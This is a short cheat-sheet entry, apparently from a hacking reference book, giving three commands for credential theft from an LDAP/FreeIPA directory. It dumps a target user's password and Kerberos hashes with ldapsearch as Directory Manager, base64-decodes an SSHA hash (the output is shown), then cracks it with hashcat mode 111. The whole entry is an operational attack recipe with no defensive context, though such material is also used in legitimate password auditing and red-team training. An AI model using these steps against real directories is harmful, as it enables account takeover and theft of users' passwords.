STEP 1: Dump target user hash:
ldapsearch –x –h <LDAP_IPAddr> -D "cn=Directory Manager" -w <password> -b 'uid=<target_username>,cn=users,cn=accounts,dc=<DOMAIN>,dc=COM' uid userpassword krbprincipalkey sambalmpassword sambantpassword
#hashcrack
STEP 2: The ‘userpassword::’ and ‘krbprincipalkey::’ hash is base64 encoded and now you need to decode it:
echo 'e1NTSEF9dHZEaUZ4ejJTUkRBLzh1NUZSSGVIT2N4WkZMci9OYktQNHNLNWc9PQ==' | base64 --decode
{SSHA}tvDiFxz2SRDA/8u5FRHeHOcxZFLr/NbKP4sK5g==
STEP 3: Place your decoded hash into hash.txt file and fire up Hashcat mode ‘111’ and attempt to crack the password hash:
hashcat –a 0 –m 111 hash.txt dict.txt
amazon.com/dp/1793458618
#hashcrack